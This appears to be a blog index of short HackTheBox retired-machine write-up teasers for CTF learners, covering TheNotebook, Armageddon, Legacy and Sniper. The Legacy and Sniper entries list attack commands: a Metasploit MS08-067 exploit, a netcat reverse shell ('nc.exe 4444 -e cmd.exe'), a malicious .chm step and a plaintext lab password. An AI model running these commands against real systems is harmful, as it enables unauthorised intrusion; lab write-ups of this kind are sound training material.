HackTheBox retired machine writeups 5 (4)

Hackthebox Retired machine Writeups

Hackthebox retired machine are those machines which are not active on the Hackthebox . But the good thing about the retired machines is that the writeups for hackthebox retired machines are available . So the beginners who are starting the CTF journey can read these writeups and get the idea how the machines are solved . 

Hackthebox thenotebook writeup 4.9 (16)

Hackthebox thenotebook writeup

It is a medium level machine from hackthebox which is great for learning new skills . It starts with the abusing of jwt token which leads to admin panel and which further leads to the www-shell . Then a little enumeration we get the ssh keys for the user. For privilege escalation sudo exploitation was enough and a little google gets the work done.

Hackthebox armageddon writeup 4.3 (51)

Hackthebox armageddon writeup

It is an easy Linux machine .Nmap revels that it is running two ports only one is 22 and other 80. Nmap also revels that it is running Drupal 7 CMS.This was the initial foothold. After that we get MySQL creds leading to creds of a valid ssh user.Using snapd for Linux privilege escalation was interesting .

Hack the box(HTB) Legacy writeup 0 (0)

Hack the box(HTB) legacy writeup

Its an easy box from hack the box which is very easy and it is more of CVE type. Commands used nmap -sC -sV -O -v -oA initial msfconsole use exploit/windows/smb/ms08_067_netapi show options Steps involved EnumerationFinding exploitUsing metasploit module to exploit it. Enumeration Nmap Scan Increasing send delay for from 0 to 5 … Read more

Hack the box(HTB) Sniper write up 0 (0)

Hack the box(HTB) Sniper write up

Steps Nmap scan Finding RFI Setting up Samba server Getting reverse shell Privilege escalation(Getting user.txt) Basic enumeration Making malicious .chm file Getting the reverse shell(Getting root.txt) Commands used nmap -sC -sV -oV nano /etc/samba/smb.conf service smbd start nc.exe 4444 -e cmd.exe powershell $username = ‘SNIPER\Chris’ $password = ’36mEAhz/B8xQ~2VM’ $securePassword = ConvertTo-SecureString $password -AsPlainText … Read more